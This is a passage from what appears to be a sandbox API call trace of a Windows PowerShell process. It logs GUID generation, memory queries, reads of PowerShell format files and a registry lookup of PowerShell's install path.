Data3=0x48f8, Data4=([0]=0xa5, [1]=0x7b, [2]=0x38, [3]=0xc9, [4]=0x9, [5]=0x65, [6]=0xe0, [7]=0x67))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x67f95f3, Data2=0xdfea, Data3=0x468f, Data4=([0]=0xa4, [1]=0x8b, [2]=0x2b, [3]=0x59, [4]=0x56, [5]=0x9b, [6]=0x76, [7]=0xd6))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x326d7e7a, Data2=0xc49e, Data3=0x494c, Data4=([0]=0x87, [1]=0xf2, [2]=0x50, [3]=0xb3, [4]=0xdc, [5]=0xa3, [6]=0xbb, [7]=0x70))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf4a55768, Data2=0xa313, Data3=0x4200, Data4=([0]=0x82, [1]=0xee, [2]=0xc, [3]=0x56, [4]=0x8d, [5]=0x9d, [6]=0xed, [7]=0xc9))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc548939f, Data2=0x9849, Data3=0x4a6c, Data4=([0]=0xbf, [1]=0x2, [2]=0x4a, [3]=0x40, [4]=0x6c, [5]=0xd6, [6]=0xf3, [7]=0x2d))) returned 0x0 [0052.965] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9b46a408, Data2=0x4361, Data3=0x413f, Data4=([0]=0xaa, [1]=0x4d, [2]=0x18, [3]=0x47, [4]=0xf9, [5]=0xd8, [6]=0x9d, [7]=0x32))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf35504b5, Data2=0x7c6f, Data3=0x401a, Data4=([0]=0x90, [1]=0xf8, [2]=0xb0, [3]=0x78, [4]=0x54, [5]=0xf3, [6]=0x80, [7]=0xb6))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x191cce6c, Data2=0x9e53, Data3=0x4336, Data4=([0]=0x8e, [1]=0xbd, [2]=0xb, [3]=0x52, [4]=0xc3, [5]=0x8a, [6]=0xb2, [7]=0x28))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6cf365ad, Data2=0x6e0c, Data3=0x43b2, Data4=([0]=0x97, [1]=0x42, [2]=0xbe, [3]=0xb9, [4]=0x9, [5]=0x6e, [6]=0x62, [7]=0x13))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb9304268, Data2=0x239d, Data3=0x488a, Data4=([0]=0x98, [1]=0x38, [2]=0xbd, [3]=0x95, [4]=0x58, [5]=0xba, [6]=0x0, [7]=0xb6))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xefee7659, Data2=0x1ffd, Data3=0x4d56, Data4=([0]=0xaf, [1]=0x9d, [2]=0x94, [3]=0xaf, [4]=0x74, [5]=0xbe, [6]=0x7e, [7]=0x6f))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x768c74b5, Data2=0xb29e, Data3=0x447d, Data4=([0]=0x93, [1]=0x48, [2]=0xa7, [3]=0x7b, [4]=0x64, [5]=0x6b, [6]=0x67, [7]=0xdc))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2fb3ca9b, Data2=0xbf4c, Data3=0x4ca6, Data4=([0]=0x9e, [1]=0xc5, [2]=0x2b, [3]=0xd3, [4]=0xe1, [5]=0xa6, [6]=0xc6, [7]=0x2))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa3d91c5d, Data2=0x1070, Data3=0x4b50, Data4=([0]=0xad, [1]=0x17, [2]=0xd5, [3]=0x7d, [4]=0xb2, [5]=0xad, [6]=0xa5, [7]=0xc1))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6832cea5, Data2=0x72dc, Data3=0x4050, Data4=([0]=0xa2, [1]=0xf2, [2]=0x11, [3]=0x59, [4]=0xe4, [5]=0xe6, [6]=0x9b, [7]=0x9e))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xff64d600, Data2=0xb7d3, Data3=0x4516, Data4=([0]=0xa4, [1]=0x65, [2]=0xfe, [3]=0xab, [4]=0x59, [5]=0x7d, [6]=0x35, [7]=0x6c))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6553d479, Data2=0x9d25, Data3=0x44bb, Data4=([0]=0x8b, [1]=0x2, [2]=0x8d, [3]=0x19, [4]=0x0, [5]=0x6a, [6]=0x7f, [7]=0x51))) returned 0x0 [0052.967] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7229c4f8, Data2=0xb5ae, Data3=0x4dda, Data4=([0]=0xa4, [1]=0xc0, [2]=0xe2, [3]=0x5f, [4]=0xe0, [5]=0x26, [6]=0x65, [7]=0x43))) returned 0x0 [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe824f26, Data2=0xf6b3, Data3=0x4198, Data4=([0]=0x99, [1]=0xb9, [2]=0x2, [3]=0xc1, [4]=0xce, [5]=0x5c, [6]=0xbb, [7]=0x4d))) returned 0x0 [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9f2decb9, Data2=0x4e6b, Data3=0x4bb6, Data4=([0]=0xb5, [1]=0x43, [2]=0xa4, [3]=0x14, [4]=0x31, [5]=0x12, [6]=0x79, [7]=0x1f))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6d0f26fb, Data2=0x3a82, Data3=0x40d0, Data4=([0]=0xa9, [1]=0xdf, [2]=0x3e, [3]=0x96, [4]=0xf, [5]=0xc8, [6]=0x48, [7]=0xa4))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd93e4293, Data2=0xb32c, Data3=0x4051, Data4=([0]=0xa9, [1]=0xd1, [2]=0xc5, [3]=0xd0, [4]=0xe3, [5]=0xe5, [6]=0x39, [7]=0x23))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x59f7d872, Data2=0x2b41, Data3=0x4620, Data4=([0]=0xb5, [1]=0x9c, [2]=0x9d, [3]=0x14, [4]=0x2, [5]=0xf6, [6]=0x19, [7]=0x79))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x725fbe89, Data2=0xc237, Data3=0x48b9, Data4=([0]=0x9e, [1]=0x7c, [2]=0xc6, [3]=0x1c, [4]=0x78, [5]=0x93, [6]=0xed, [7]=0xc4))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x61d8fee5, Data2=0x2915, Data3=0x47ac, Data4=([0]=0x87, [1]=0xe4, [2]=0xaa, [3]=0xff, [4]=0x16, [5]=0x29, [6]=0x39, [7]=0xba))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x29212f95, Data2=0xa1f8, Data3=0x40c9, Data4=([0]=0xa9, [1]=0xb3, [2]=0xe0, [3]=0xe2, [4]=0xea, [5]=0x95, [6]=0x5a, [7]=0x83))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x13833169, Data2=0xddbb, Data3=0x4d83, Data4=([0]=0xa8, [1]=0x42, [2]=0x40, [3]=0x61, [4]=0x66, [5]=0x7d, [6]=0xf7, [7]=0x7f))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf7d88fa4, Data2=0x131a, Data3=0x4965, Data4=([0]=0x87, [1]=0x78, [2]=0xb1, [3]=0x1d, [4]=0x20, [5]=0x5f, [6]=0x27, [7]=0x3))) returned 0x0 [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcab9f578, Data2=0x6486, Data3=0x4963, Data4=([0]=0xb5, [1]=0x6b, [2]=0x96, [3]=0xe0, [4]=0x1b, [5]=0xa8, [6]=0x3a, [7]=0x16))) returned 0x0 [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x33d7b60d, Data2=0x1d9d, Data3=0x492b, Data4=([0]=0x94, [1]=0xf0, [2]=0xfd, [3]=0x43, [4]=0xb1, [5]=0xc1, [6]=0x48, [7]=0xf3))) returned 0x0 [0052.970] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd16d00a4, Data2=0x7e, Data3=0x4b8f, Data4=([0]=0x81, [1]=0xe3, [2]=0x4b, [3]=0xf2, [4]=0xfd, [5]=0xd9, [6]=0xf8, [7]=0x28))) returned 0x0 [0052.970] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.971] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x73256056, Data2=0x3775, Data3=0x495c, Data4=([0]=0xae, [1]=0xe6, [2]=0x73, [3]=0xbb, [4]=0xa6, [5]=0x40, [6]=0x5f, [7]=0x14))) returned 0x0 [0052.973] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x8837f573, Data2=0xd006, Data3=0x45e1, Data4=([0]=0xb7, [1]=0xa3, [2]=0xa6, [3]=0xc5, [4]=0x1b, [5]=0x7c, [6]=0xe5, [7]=0xce))) returned 0x0 [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x215019ff, Data2=0x24cb, Data3=0x4dfd, Data4=([0]=0xaa, [1]=0x52, [2]=0xe2, [3]=0x2a, [4]=0xb1, [5]=0x2f, [6]=0x54, [7]=0xef))) returned 0x0 [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x622466c8, Data2=0x8770, Data3=0x4290, Data4=([0]=0xac, [1]=0xb8, [2]=0xb2, [3]=0x21, [4]=0xe6, [5]=0x98, [6]=0x47, [7]=0x40))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b8703a0, Data2=0x6437, Data3=0x4039, Data4=([0]=0xa7, [1]=0xc0, [2]=0xfa, [3]=0x8c, [4]=0xff, [5]=0x3c, [6]=0xd7, [7]=0x8b))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x372d08af, Data2=0xf910, Data3=0x4882, Data4=([0]=0x94, [1]=0x74, [2]=0x3b, [3]=0x97, [4]=0xe9, [5]=0x5, [6]=0x1d, [7]=0x7))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e7bf5b9, Data2=0x49c7, Data3=0x4723, Data4=([0]=0x9c, [1]=0x84, [2]=0x22, [3]=0x78, [4]=0x59, [5]=0x73, [6]=0xe7, [7]=0x86))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x1d656c3f, Data2=0x24a1, Data3=0x452c, Data4=([0]=0xba, [1]=0xeb, [2]=0x94, [3]=0x3e, [4]=0x92, [5]=0x31, [6]=0xf3, [7]=0xb0))) returned 0x0 [0052.974] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf55f2541, Data2=0x9194, Data3=0x41b2, Data4=([0]=0xaf, [1]=0x65, [2]=0xd8, [3]=0xae, [4]=0xd0, [5]=0xc3, [6]=0xb9, [7]=0x45))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7ad16ec9, Data2=0x9e2d, Data3=0x4027, Data4=([0]=0xb9, [1]=0x29, [2]=0x2c, [3]=0x4d, [4]=0x4c, [5]=0x37, [6]=0xc3, [7]=0x46))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x40cf75bf, Data2=0x1a6b, Data3=0x417b, Data4=([0]=0xb4, [1]=0x2c, [2]=0x79, [3]=0xfd, [4]=0x60, [5]=0x66, [6]=0xd3, [7]=0x95))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf7200dfc, Data2=0x8f, Data3=0x4c66, Data4=([0]=0x87, [1]=0xaa, [2]=0x53, [3]=0xf5, [4]=0x4b, [5]=0xa6, [6]=0x40, [7]=0x42))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd5c59e2d, Data2=0x6b39, Data3=0x4dd2, Data4=([0]=0x84, [1]=0x23, [2]=0xa3, [3]=0xf2, [4]=0x5e, [5]=0xbb, [6]=0xd0, [7]=0x3))) returned 0x0 [0052.975] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6f261b4b, Data2=0xc442, Data3=0x4fed, Data4=([0]=0x86, [1]=0xb6, [2]=0x8e, [3]=0x4d, [4]=0xd2, [5]=0xd2, [6]=0x71, [7]=0xd5))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc1db7a1d, Data2=0x8cd3, Data3=0x4631, Data4=([0]=0xbf, [1]=0x2d, [2]=0x90, [3]=0x5, [4]=0x9f, [5]=0x53, [6]=0xa7, [7]=0xb3))) returned 0x0 [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.976] GetLastError () returned 0x0 [0052.976] SetErrorMode (uMode=0x1) returned 0x1 [0052.976] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.976] GetLastError () returned 0x0 [0052.976] GetFileType (hFile=0x2f8) returned 0x1 [0052.976] SetErrorMode (uMode=0x1) returned 0x1 [0052.976] GetFileType (hFile=0x2f8) returned 0x1 [0052.976] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.978] GetLastError () returned 0x0 [0052.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.978] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x8b4, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28de67c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28de67c*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] CloseHandle (hObject=0x2f8) returned 1 [0052.979] GetLastError () returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.980] SetErrorMode (uMode=0x1) returned 0x1 [0052.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2900224 | out: lpFileInformation=0x2900224*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0052.980] GetLastError () returned 0x0 [0052.980] SetErrorMode (uMode=0x1) returned 0x1 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.980] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.980] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.980] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.980] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.981] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3f12ad4b, Data2=0xcb1c, Data3=0x4bc1, Data4=([0]=0x90, [1]=0xfe, [2]=0x3d, [3]=0xa3, [4]=0xb6, [5]=0x7a, [6]=0x91, [7]=0x57))) returned 0x0 [0052.981] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6178cc6c, Data2=0xf830, Data3=0x46d6, Data4=([0]=0x89, [1]=0xd, [2]=0xcd, [3]=0x47, [4]=0xce, [5]=0xe8, [6]=0x86, [7]=0xd5))) returned 0x0 [0052.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.981] GetLastError () returned 0x0 [0052.981] SetErrorMode (uMode=0x1) returned 0x1 [0052.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.981] GetLastError () returned 0x0 [0052.981] GetFileType (hFile=0x2f8) returned 0x1 [0052.982] SetErrorMode (uMode=0x1) returned 0x1 [0052.982] GetFileType (hFile=0x2f8) returned 0x1 [0052.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.983] GetLastError () returned 0x0 [0052.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0xe98, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x291576c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x291576c*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] CloseHandle (hObject=0x2f8) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.985] GetLastError () returned 0x0 [0052.985] SetErrorMode (uMode=0x1) returned 